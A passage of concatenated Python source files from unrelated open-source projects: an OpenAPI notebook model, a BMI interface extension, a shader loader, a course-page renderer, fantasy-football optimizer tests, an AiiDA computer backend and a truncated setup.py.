globals()["NotebookLogStreamCellAttributes"] = NotebookLogStreamCellAttributes
globals()["NotebookMarkdownCellAttributes"] = NotebookMarkdownCellAttributes
globals()["NotebookSplitBy"] = NotebookSplitBy
globals()["NotebookTimeseriesCellAttributes"] = NotebookTimeseriesCellAttributes
globals()["NotebookToplistCellAttributes"] = NotebookToplistCellAttributes
class NotebookCellResponseAttributes(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {}
@cached_property
def discriminator():
return None
attribute_map = {}
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
"_composed_instances",
"_var_name_to_model_instances",
"_additional_properties_model_instances",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""NotebookCellResponseAttributes - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
graph_size (NotebookGraphSize): [optional] # noqa: E501
split_by (NotebookSplitBy): [optional] # noqa: E501
time (NotebookCellTime): [optional] # noqa: E501
definition (LogStreamWidgetDefinition): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
"_check_type": _check_type,
"_path_to_item": _path_to_item,
"_spec_property_naming": _spec_property_naming,
"_configuration": _configuration,
"_visited_composed_classes": self._visited_composed_classes,
}
required_args = {}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if (
var_name in unused_args
and self._configuration is not None
and self._configuration.discard_unknown_keys
and not self._additional_properties_model_instances
):
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error because the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
"anyOf": [],
"allOf": [],
"oneOf": [
NotebookDistributionCellAttributes,
NotebookHeatMapCellAttributes,
NotebookLogStreamCellAttributes,
NotebookMarkdownCellAttributes,
NotebookTimeseriesCellAttributes,
NotebookToplistCellAttributes,
],
}
|
py | 1a4bb17e272d7fcbe8d5761006a56790c79a4444 | from abc import abstractmethod
from bmipy import Bmi
class Xmi(Bmi):
"""
This class extends the CSDMS Basic Model Interface
The extension to the BMI is twofold:
- the model's outer convergence loop is exposed to facilitate coupling at
this level
- a model can have sub-components which share the time stepping but have
their own convergence loop
It does not change anything in the BMI interface, so models implementing
the XMI interface are compatible with BMI
"""
@abstractmethod
def prepare_time_step(self, dt) -> None:
""" """
...
@abstractmethod
def do_time_step(self) -> None:
""" """
...
@abstractmethod
def finalize_time_step(self) -> None:
""" """
...
@abstractmethod
def get_subcomponent_count(self) -> int:
""" """
...
@abstractmethod
def prepare_solve(self, component_id) -> None:
""" """
...
@abstractmethod
def solve(self, component_id) -> bool:
""" """
...
@abstractmethod
def finalize_solve(self, component_id) -> None:
""" """
...
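# A minimal driver sketch for the extended interface (illustrative only:
# "model" stands for some concrete Xmi implementation, component ids are
# assumed to be integers, and the convergence handling is simplified):
#
#   model.prepare_time_step(dt)
#   for component_id in range(1, model.get_subcomponent_count() + 1):
#       model.prepare_solve(component_id)
#       while not model.solve(component_id):
#           pass  # solve() is assumed to return True once the component converges
#       model.finalize_solve(component_id)
#   model.finalize_time_step()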
|
py | 1a4bb1abe3d6b465c612060aa5cd967966c93e33 | import logging
import moderngl
from moderngl_window.loaders.base import BaseLoader
from moderngl_window.opengl import program
from moderngl_window.exceptions import ImproperlyConfigured
logger = logging.getLogger(__name__)
class Loader(BaseLoader):
kind = "single"
def load(self) -> moderngl.Program:
"""Loads a shader program from a single glsl file.
Each shader type is separated by preprocessors
- VERTEX_SHADER
- FRAGMENT_SHADER
- GEOMETRY_SHADER
- TESS_CONTROL_SHADER
- TESS_EVALUATION_SHADER
Example:
.. code:: glsl
#version 330
#if defined VERTEX_SHADER
in vec3 in_position;
in vec2 in_texcoord_0;
out vec2 uv0;
void main() {
gl_Position = vec4(in_position, 1);
uv0 = in_texcoord_0;
}
#elif defined FRAGMENT_SHADER
out vec4 fragColor;
uniform sampler2D texture0;
in vec2 uv0;
void main() {
fragColor = texture(texture0, uv0);
}
#endif
Returns:
moderngl.Program: The Program instance
"""
self.meta.resolved_path, source = self._load_source(self.meta.path)
shaders = program.ProgramShaders.from_single(self.meta, source)
shaders.handle_includes(self._load_source)
prog = shaders.create()
# Wrap the program if reloadable is set
if self.meta.reloadable:
# Disable reload flag so reloads will return Program instances
self.meta.reloadable = False
# Wrap it ..
prog = program.ReloadableProgram(self.meta, prog)
return prog
def _load_source(self, path):
"""Finds and loads a single source file.
Args:
path: Path to resource
Returns:
Tuple[resolved_path, source]: The resolved path and the source
"""
resolved_path = self.find_program(path)
if not resolved_path:
raise ImproperlyConfigured("Cannot find program '{}'".format(path))
logger.info("Loading: %s", path)
with open(str(resolved_path), "r") as fd:
return resolved_path, fd.read()
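# A minimal usage sketch (hedged: the file name is a placeholder and a resource
# directory is assumed to be registered). The loader is normally reached via the
# moderngl-window resource registry rather than instantiated directly:
#
#   from moderngl_window import resources
#   from moderngl_window.meta import ProgramDescription
#
#   prog = resources.programs.load(ProgramDescription(path="programs/my_shader.glsl"))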
|
py | 1a4bb3483c40c3f5149f9071e503d08d03390d49 | from datetime import date, datetime, time
from typing import Any, Dict, Optional
from flask import url_for
from flask_frozen import UrlForLogger
from git import Repo
from naucse import views
from naucse.models import Course
from naucse.utils.views import page_content_cache_key, get_edit_info
def get_course_from_slug(slug: str) -> Course:
""" Gets the actual course instance from a slug.
"""
parts = slug.split("/")
if parts[0] == "course":
return views.model.courses[parts[1]]
else:
return views.model.runs[(int(parts[0]), parts[1])]
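# For example (hypothetical slugs): "course/pyladies" resolves to
# views.model.courses["pyladies"], while "2018/pyladies-brno" resolves to
# views.model.runs[(2018, "pyladies-brno")].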
def course_info(slug: str, *args, **kwargs) -> Dict[str, Any]:
"""Return info about the given course.
Return some extra info when it's a run (based on COURSE_INFO/RUN_INFO)
"""
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
if "course" in slug:
attributes = Course.COURSE_INFO
else:
attributes = Course.RUN_INFO
data = {}
for attr in attributes:
val = getattr(course, attr)
if isinstance(val, (date, datetime, time)):
val = val.isoformat()
data[attr] = val
return data
def serialize_license(license) -> Optional[Dict[str, str]]:
"""Serialize a License instance into a dict.
"""
if license:
return {
"url": license.url,
"title": license.title
}
return None
def render(page_type: str, slug: str, *args, **kwargs) -> Dict[str, Any]:
"""Return a rendered page for a course, based on page_type and slug.
"""
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
path = []
if kwargs.get("request_url"):
path = [kwargs["request_url"]]
logger = UrlForLogger(views.app)
with views.app.test_request_context(*path):
with logger:
info = {
"course": {
"title": course.title,
"url": views.course_url(course),
"vars": course.vars,
"canonical": course.canonical,
"is_derived": course.is_derived,
},
}
if page_type == "course":
info["content"] = views.course_content(course)
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "calendar":
info["content"] = views.course_calendar_content(course)
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "calendar_ics":
info["calendar"] = str(views.generate_calendar_ics(course))
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "course_page":
lesson_slug, page, solution, *_ = args
lesson = views.model.get_lesson(lesson_slug)
content_offer_key = kwargs.get("content_key")
not_processed = object()
content = not_processed
if content_offer_key is not None:
# the base repository has a cached version of the content
content_key = page_content_cache_key(Repo("."), lesson_slug, page, solution, course.vars)
# if the key matches what would be produced here, let's not return anything
# and the cached version will be used
if content_offer_key == content_key:
content = None
request_url = kwargs.get("request_url")
if request_url is None:
request_url = url_for('course_page', course=course, lesson=lesson, page=page, solution=solution)
lesson_url, subpage_url, static_url = views.relative_url_functions(request_url, course, lesson)
page, session, prv, nxt = views.get_page(course, lesson, page)
# if content isn't cached or the version was refused, let's render
# the content here (but just the content and not the whole page with headers, menus etc)
if content is not_processed:
content = views.page_content(
lesson, page, solution, course,
lesson_url=lesson_url,
subpage_url=subpage_url,
static_url=static_url,
without_cache=True,
)
if content is None:
info["content"] = None
info["content_urls"] = []
else:
info["content"] = content["content"]
info["content_urls"] = content["urls"]
info.update({
"page": {
"title": page.title,
"css": page.info.get("css"), # not page.css since we want the css without limitation
"latex": page.latex,
"attributions": page.attributions,
"license": serialize_license(page.license),
"license_code": serialize_license(page.license_code)
},
"edit_info": get_edit_info(page.edit_path)
})
if session is not None:
info["session"] = {
"title": session.title,
"url": url_for("session_coverpage", course=course.slug, session=session.slug),
"slug": session.slug,
}
prev_link, session_link, next_link = views.get_footer_links(course, session, prv, nxt, lesson_url)
info["footer"] = {
"prev_link": prev_link,
"session_link": session_link,
"next_link": next_link
}
elif page_type == "session_coverpage":
session_slug, coverpage, *_ = args
session = course.sessions.get(session_slug)
info.update({
"session": {
"title": session.title,
"url": url_for("session_coverpage", course=course.slug, session=session.slug),
},
"content": views.session_coverpage_content(course, session, coverpage),
"edit_info": get_edit_info(session.get_edit_path(course, coverpage)),
})
else:
raise ValueError("Invalid page type.")
# generate list of absolute urls which need to be frozen further
urls = set()
for endpoint, values in logger.iter_calls():
url = url_for(endpoint, **values)
if url.startswith(f"/{slug}"): # this is checked once again in main repo, but let's save cache space
urls.add(url)
info["urls"] = list(urls)
return info
def get_footer_links(slug, lesson_slug, page, request_url=None):
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
try:
lesson = views.model.get_lesson(lesson_slug)
except LookupError:
raise ValueError("Lesson not found")
path = []
if request_url is not None:
path = [request_url]
with views.app.test_request_context(*path):
def lesson_url(lesson, *args, **kwargs):
return url_for("course_page", course=course, lesson=lesson, *args, **kwargs)
page, session, prv, nxt = views.get_page(course, lesson, page)
prev_link, session_link, next_link = views.get_footer_links(course, session, prv, nxt, lesson_url)
return {
"prev_link": prev_link,
"session_link": session_link,
"next_link": next_link
}
|
py | 1a4bb3aa2209410ce07416c261c2328a63d3bef8 | """
Test the optimization of transfers, generating a few simplified scenarios
and checking that the optimizer finds the expected outcome.
"""
from unittest import mock
from operator import itemgetter
from airsenal.framework.squad import Squad
from airsenal.framework.optimization_utils import (
get_discount_factor,
next_week_transfers,
count_expected_outputs,
)
from airsenal.framework.optimization_transfers import (
make_optimum_single_transfer,
make_optimum_double_transfer,
)
class DummyPlayer(object):
"""
fake player that we can add to a squad, giving a specified expected score.
"""
def __init__(self, player_id, position, points_dict):
"""
we generate squad to avoid >3-players-per-team problem,
and set price to 0 to avoid overrunning budget.
"""
self.player_id = player_id
self.fpl_api_id = player_id
self.name = "player_{}".format(player_id)
self.position = position
self.team = "DUMMY_TEAM_{}".format(player_id)
self.purchase_price = 0
self.is_starting = True
self.is_captain = False
self.is_vice_captain = False
self.predicted_points = {"DUMMY": points_dict}
self.sub_position = None
def calc_predicted_points(self, dummy):
pass
def generate_dummy_squad(player_points_dict=None):
"""
Fill a squad up with dummy players.
player_points_dict is a dictionary
{ player_id: { gw: points,...} ,...}
"""
if not player_points_dict: # make a simple one
player_points_dict = {i: {1: 2} for i in range(15)}
t = Squad()
for i in range(15):
if i < 2:
position = "GK"
elif i < 7:
position = "DEF"
elif i < 12:
position = "MID"
else:
position = "FWD"
t.add_player(DummyPlayer(i, position, player_points_dict[i]))
return t
def predicted_point_mock_generator(point_dict):
"""
return a function that will mock the get_predicted_points function
the point_dict it is given should be keyed by position, i.e.
{"GK" : {player_id: points, ...}, "DEF": {}, ... }
"""
def mock_get_predicted_points(gameweek, tag, position, team=None):
"""
return an ordered list in the same way as the real
get_predicted_points func does. EXCEPT - we return dummy players rather
than just ids (so the Squad.add_player can add them)
"""
output_pid_list = [(k, v) for k, v in point_dict[position].items()]
output_pid_list.sort(key=itemgetter(1), reverse=True)
# return output_pid_list
if isinstance(gameweek, list):
gameweek = gameweek[0]
return [
(DummyPlayer(entry[0], position, {gameweek: entry[1]}), entry[1])
for entry in output_pid_list
]
return mock_get_predicted_points
def test_subs():
"""
mock squads with some players predicted some points, and
some predicted to score zero, and check we get the right starting 11.
"""
points_dict = {
0: {1: 0},
1: {1: 2},
2: {1: 2},
3: {1: 2},
4: {1: 0},
5: {1: 2},
6: {1: 2},
7: {1: 2},
8: {1: 2},
9: {1: 0},
10: {1: 2},
11: {1: 4},
12: {1: 0},
13: {1: 2},
14: {1: 3},
}
# should get 4,4,2, with players 0,4,9,12 on the bench,
# captain player 11, vice-captain player 14
# should have 29 points (9*2 + 3 + (2*4) )
t = generate_dummy_squad(points_dict)
ep = t.get_expected_points(1, "DUMMY")
assert ep == 29
assert t.players[0].is_starting is False
assert t.players[4].is_starting is False
assert t.players[9].is_starting is False
assert t.players[12].is_starting is False
assert t.players[11].is_captain is True
assert t.players[14].is_vice_captain is True
def test_single_transfer():
"""
mock squad with all players predicted 2 points, and potential transfers
with higher scores, check we get the best transfer.
"""
t = generate_dummy_squad()
position_points_dict = {
"GK": {0: 2, 1: 2, 100: 0, 101: 0, 200: 3, 201: 2}, # in the orig squad
"DEF": {
2: 2,
3: 2,
4: 2,
5: 2,
6: 2, # in the orig squad
103: 0,
104: 0,
105: 5,
106: 2,
107: 2,
203: 0,
204: 0,
205: 1,
206: 2,
207: 2,
},
"MID": {
7: 2,
8: 2,
9: 2,
10: 2,
11: 2, # in the orig squad
108: 2,
109: 2,
110: 3,
111: 3,
112: 0,
208: 2,
209: 2,
210: 3,
211: 3,
212: 0,
},
"FWD": {12: 2, 13: 2, 14: 2, 113: 6, 114: 3, 115: 7}, # in the orig squad
}
mock_pred_points = predicted_point_mock_generator(position_points_dict)
with mock.patch(
"airsenal.framework.optimization_transfers.get_predicted_points",
side_effect=mock_pred_points,
):
new_squad, pid_out, pid_in = make_optimum_single_transfer(t, "DUMMY", [1])
# we should expect - player 115 to be transfered in, and to be captain.
assert pid_in[0] == 115
for p in new_squad.players:
if p.player_id == 115:
assert p.is_captain is True
else:
assert p.is_captain is False
# expected points should be 10*2 + 7*2 = 34
assert new_squad.get_expected_points(1, "DUMMY") == 34
def test_double_transfer():
"""
mock squad with two players predicted low score, see if we get better players
transferred in.
"""
t = generate_dummy_squad()
position_points_dict = {
"GK": {0: 2, 1: 2, 100: 0, 101: 0, 200: 3, 201: 7}, # in the orig squad
"DEF": {
2: 2,
3: 2,
4: 2,
5: 2,
6: 2, # in the orig squad
103: 0,
104: 0,
105: 5,
106: 2,
107: 2,
203: 0,
204: 0,
205: 1,
206: 2,
207: 2,
},
"MID": {
7: 2,
8: 2,
9: 2,
10: 2,
11: 2, # in the orig squad
108: 2,
109: 2,
110: 3,
111: 3,
112: 0,
208: 2,
209: 2,
210: 3,
211: 3,
212: 0,
},
"FWD": {12: 2, 13: 2, 14: 2, 113: 6, 114: 3, 115: 8}, # in the orig squad
}
mock_pred_points = predicted_point_mock_generator(position_points_dict)
with mock.patch(
"airsenal.framework.optimization_transfers.get_predicted_points",
side_effect=mock_pred_points,
):
new_squad, pid_out, pid_in = make_optimum_double_transfer(t, "DUMMY", [1])
# we should expect 201 and 115 to be transferred in, and 1,15 to
# be transferred out. 115 should be captain
assert 201 in pid_in
assert 115 in pid_in
print(new_squad)
for p in new_squad.players:
if p.player_id == 115:
assert p.is_captain is True
else:
assert p.is_captain is False
def test_get_discount_factor():
"""
Discount factor discounts future gameweek score predictions based on the
number of gameweeks ahead. It uses two discount types, both based on a
discount of 14/15: exponential ({14/15}^{weeks ahead}) and constant
(1 - {1/15}*weeks ahead, floored at zero).
"""
assert get_discount_factor(1, 4) == (14 / 15) ** (4 - 1)
assert get_discount_factor(1, 4, "constant") == 1 - ((1 / 15) * (4 - 1))
assert get_discount_factor(1, 20, "const") == 0
assert get_discount_factor(1, 1, "const") == 1
assert get_discount_factor(1, 1, "exp") == 1
def test_next_week_transfers_no_chips_no_constraints():
# First week (blank starting strat with 1 free transfer available)
strat = (1, 0, {"players_in": {}, "chips_played": {}})
# No chips or constraints
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=True,
max_transfers=2,
)
# (no. transfers, free transfers following week, points hit)
expected = [(0, 2, 0), (1, 1, 0), (2, 1, 4)]
assert actual == expected
def test_next_week_transfers_any_chip_no_constraints():
# All chips, no constraints
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={
"chips_allowed": ["wildcard", "free_hit", "bench_boost", "triple_captain"],
"chip_to_play": None,
},
)
expected = [
(0, 2, 0),
(1, 1, 0),
(2, 1, 4),
("W", 1, 0),
("F", 1, 0),
("B0", 2, 0),
("B1", 1, 0),
("B2", 1, 4),
("T0", 2, 0),
("T1", 1, 0),
("T2", 1, 4),
]
assert actual == expected
def test_next_week_transfers_no_chips_zero_hit():
# No points hits
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=0,
allow_unused_transfers=True,
max_transfers=2,
)
expected = [(0, 2, 0), (1, 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_no_unused():
# 2 free transfers available, no wasted transfers
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
)
expected = [(1, 2, 0), (2, 1, 0)]
assert actual == expected
def test_next_week_transfers_chips_already_used():
# Chips allowed but previously used
strat = (
1,
0,
{
"players_in": {},
"chips_played": {
1: "wildcard",
2: "free_hit",
3: "bench_boost",
4: "triple_captain",
},
},
)
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
)
expected = [(0, 2, 0), (1, 1, 0), (2, 1, 4)]
assert actual == expected
def test_next_week_transfers_play_wildcard():
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "wildcard"},
)
expected = [("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_allow_wildcard():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": ["wildcard"], "chip_to_play": None},
)
expected = [(0, 2, 0), (1, 2, 0), (2, 1, 0), ("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_allow_wildcard_no_unused():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
chips={"chips_allowed": ["wildcard"], "chip_to_play": None},
)
expected = [(1, 2, 0), (2, 1, 0), ("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_play_wildcard():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "wildcard"},
)
expected = [("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_play_bench_boost_no_unused():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "bench_boost"},
)
expected = [("B1", 2, 0), ("B2", 1, 0)]
assert actual == expected
def test_next_week_transfers_play_triple_captain_max_transfers_3():
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=True,
max_transfers=3,
chips={"chips_allowed": [], "chip_to_play": "triple_captain"},
)
expected = [("T0", 2, 0), ("T1", 1, 0), ("T2", 1, 4), ("T3", 1, 8)]
assert actual == expected
def test_count_expected_outputs_no_chips_no_constraints():
# No constraints or chips, expect 3**num_gameweeks strategies
count = count_expected_outputs(
3,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={},
)
assert count == 3 ** 3
# Max hit 0
# Include:
# (0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 1, 0), (0, 1, 1), (0, 1, 2),
# (0, 2, 0), (0, 2, 1), (1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 1, 0), (1, 1, 1)
# Exclude:
# (0, 2, 2), (1, 1, 2), (1, 2, 0), (1, 2, 1), (1, 2, 2), (2, 0, 0), (2, 0, 1),
# (2, 0, 2), (2, 1, 0), (2, 1, 1), (2, 1, 2), (2, 2, 0), (2, 2, 1), (2, 2, 2)
def test_count_expected_outputs_no_chips_zero_hit():
count = count_expected_outputs(
3,
free_transfers=1,
max_total_hit=0,
next_gw=1,
max_transfers=2,
chip_gw_dict={},
)
assert count == 13
# Start with 2 FT and no unused
# Include:
# (0, 0, 0), (1, 1, 1), (1, 1, 2), (1, 2, 0), (1, 2, 1), (1, 2, 2), (2, 0, 1),
# (2, 0, 2), (2, 1, 0), (2, 1, 1), (2, 1, 2), (2, 2, 0), (2, 2, 1), (2, 2, 2)
# Exclude:
# (0, 0, 1), (0, 0, 2), (0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 2, 0), (0, 2, 1),
# (0, 2, 2), (1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 1, 0), (2, 0, 0)
def test_count_expected_outputs_no_chips_2ft_no_unused():
count = count_expected_outputs(
3,
free_transfers=2,
max_total_hit=None,
allow_unused_transfers=False,
next_gw=1,
max_transfers=2,
)
assert count == 14
# Wildcard, 2 weeks, no constraints
# Strategies:
# (0, 0), (0, 1), (0, 2), (0, 'W'), (1, 0), (1, 1), (1, 2), (1, 'W'), (2, 0),
# (2, 1), (2, 2), (2, 'W'), ('W', 0), ('W', 1), ('W', 2)
def test_count_expected_wildcard_allowed_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chips_allowed": ["wildcard"]},
2: {"chips_allowed": ["wildcard"]},
3: {"chips_allowed": ["wildcard"]},
},
)
assert count == 15
# Bench boost, 2 weeks, no constraints
# Strategies:
# (0, 0), (0, 1), (0, 2), (0, 'B0'), (0, 'B1'), (0, 'B2'), (1, 0), (1, 1), (1, 2),
# (1, 'B0'), (1, 'B1'), (1, 'B2'), (2, 0), (2, 1), (2, 2), (2, 'B0'), (2, 'B1'),
# (2, 'B2'), ('B0', 0), ('B0', 1), ('B0', 2), ('B1', 0), ('B1', 1), ('B1', 2),
# ('B2', 0), ('B2', 1), ('B2', 2),
def test_count_expected_bench_boost_allowed_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chips_allowed": ["bench_boost"]},
2: {"chips_allowed": ["bench_boost"]},
3: {"chips_allowed": ["bench_boost"]},
},
)
assert count == 27
# Force playing wildcard in first week
# Strategies:
# ("W",0), ("W,1), ("W",2)
def test_count_expected_play_wildcard_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chip_to_play": "wildcard", "chips_allowed": []},
2: {"chip_to_play": None, "chips_allowed": []},
},
)
assert count == 3
# Force playing free hit in first week, 2FT, don't allow unused
# Strategies:
# (0,0), ("F",1), ("F",2)
def test_count_expected_play_free_hit_no_unused():
count = count_expected_outputs(
2,
free_transfers=2,
max_total_hit=None,
allow_unused_transfers=False,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chip_to_play": "free_hit", "chips_allowed": []},
2: {"chip_to_play": None, "chips_allowed": []},
},
)
assert count == 3
|
py | 1a4bb41ac9a3c24c7cb349f25cfa72b74b14f58d | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Django implementations for the `Computer` entity and collection."""
# pylint: disable=import-error,no-name-in-module
from django.db import IntegrityError, transaction
from aiida.backends.djsite.db import models
from aiida.common import exceptions
from ..computers import BackendComputerCollection, BackendComputer
from . import entities
from . import utils
class DjangoComputer(entities.DjangoModelEntity[models.DbComputer], BackendComputer):
"""Django implementation for `BackendComputer`."""
# pylint: disable=too-many-public-methods
MODEL_CLASS = models.DbComputer
def __init__(self, backend, **kwargs):
"""Construct a new `DjangoComputer` instance."""
super().__init__(backend)
self._dbmodel = utils.ModelWrapper(models.DbComputer(**kwargs))
@property
def uuid(self):
return str(self._dbmodel.uuid)
def copy(self):
"""Create an unstored clone of an already stored `Computer`."""
if not self.is_stored:
raise exceptions.InvalidOperation('You can copy a computer only after having stored it')
dbcomputer = models.DbComputer.objects.get(pk=self.pk)
dbcomputer.pk = None
newobject = self.__class__.from_dbmodel(dbcomputer) # pylint: disable=no-value-for-parameter
return newobject
def store(self):
"""Store the `Computer` instance."""
# As a first thing, I check if the data is valid
sid = transaction.savepoint()
try:
# transactions are needed here for Postgresql:
# https://docs.djangoproject.com/en/1.5/topics/db/transactions/#handling-exceptions-within-postgresql-transactions
self._dbmodel.save()
transaction.savepoint_commit(sid)
except IntegrityError:
transaction.savepoint_rollback(sid)
raise ValueError('Integrity error, probably the hostname already exists in the database')
return self
@property
def is_stored(self):
return self._dbmodel.id is not None
@property
def name(self):
return self._dbmodel.name
@property
def description(self):
return self._dbmodel.description
@property
def hostname(self):
return self._dbmodel.hostname
def get_metadata(self):
return self._dbmodel.metadata
def set_metadata(self, metadata):
self._dbmodel.metadata = metadata
def get_name(self):
return self._dbmodel.name
def set_name(self, val):
self._dbmodel.name = val
def get_hostname(self):
return self._dbmodel.hostname
def set_hostname(self, val):
self._dbmodel.hostname = val
def get_description(self):
return self._dbmodel.description
def set_description(self, val):
self._dbmodel.description = val
def get_scheduler_type(self):
return self._dbmodel.scheduler_type
def set_scheduler_type(self, scheduler_type):
self._dbmodel.scheduler_type = scheduler_type
def get_transport_type(self):
return self._dbmodel.transport_type
def set_transport_type(self, transport_type):
self._dbmodel.transport_type = transport_type
class DjangoComputerCollection(BackendComputerCollection):
"""Collection of `Computer` instances."""
ENTITY_CLASS = DjangoComputer
@staticmethod
def list_names():
return list(models.DbComputer.objects.filter().values_list('name', flat=True))
def delete(self, pk):
"""Delete the computer with the given pk."""
from django.db.models.deletion import ProtectedError
try:
models.DbComputer.objects.filter(pk=pk).delete()
except ProtectedError:
raise exceptions.InvalidOperation(
'Unable to delete the requested computer: there '
'is at least one node using this computer'
)
|
py | 1a4bb45ce4df7358592b5b62a646935b0310f3cf | from setuptools import setup, find_packages
setup(
name = 'store',
version = '0.0.2-p3',
packages = find_packages(),
install_requires = [
"Flask==1.1.2",
"Flask-Login==0.5.0",
"Flask-WTF==0.14.3",
"Werkzeug==1.0.1",
"requests==2.25.1"
],
url = 'http://cottagelabs.com/',
author = 'Cottage Labs',
author_email = '[email protected]',
description = 'Provision of a web API wrapper for storage system',
